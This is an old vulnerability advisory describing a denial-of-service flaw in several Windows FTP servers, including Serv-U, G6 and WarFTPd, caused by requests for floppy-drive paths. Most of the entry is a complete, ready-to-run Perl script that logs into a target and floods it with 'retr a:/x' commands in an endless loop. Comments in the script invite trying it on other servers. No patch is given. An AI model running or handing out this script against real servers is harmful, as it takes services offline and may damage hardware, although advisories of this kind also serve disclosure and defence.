COMMAND
ftpd
SYSTEMS AFFECTED
Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...
PROBLEM
Following is based on a Hexyn/Securax Advisory #19. There is a
DoS attack in most of the FTP Servers available on for Windows
9x/NT. The bug is a consequence of the way Windows handles disk
drives.
When sending the command "retr a:/blah" (or "get a:/blah" in the
default UNIX FTP client), the server will freeze for about one
second, and the CPU usage will go through the roof.
Bug discovered by t-Omicr0n.
#!/usr/bin/perl
#
# Serv_Me.pl - Remote FTP DoS'er
# ------------------------------
# "And in the end I will be free, by kissing you, or killing me."
# -- Mister Me.
# Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.
# It DoSSeS by flooding the server with "retr a:/bla" commands.
# CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...
# WARNING: This *may* damage the server's floppy disk drive.
use IO::Socket;
sub initiate {
if ($ARGV[0] eq '') {die "Usage: perl serv_me.pl <host> <port> <username> <password>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
};
sub connecttoserver {
print("Connecting to host: $host\n");
$socket = IO::Socket::INET->new ( PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM
) || die "Can't connect to $host";
print "Socket Connected. Loggin in...\n";
};
sub login {
print "user $user\n";
print $socket "user $user\r\n";
$response = <$socket>;
print "$response\n";
print "pass $pass\n";
print $socket "pass $pass\r\n";
$response = <$socket>;
print "$response\n";
print "Logged in. Dossing now. Press CTRL-C to stop.\n";
};
sub doit {
for (;;){
print "retr a:/x\n";
print $socket "retr a:/x\r\n";
$response = <$socket>;
print "$response";
}
}
initiate();
connecttoserver();
login();
doit();
SOLUTION
At this time, no patch is available yet.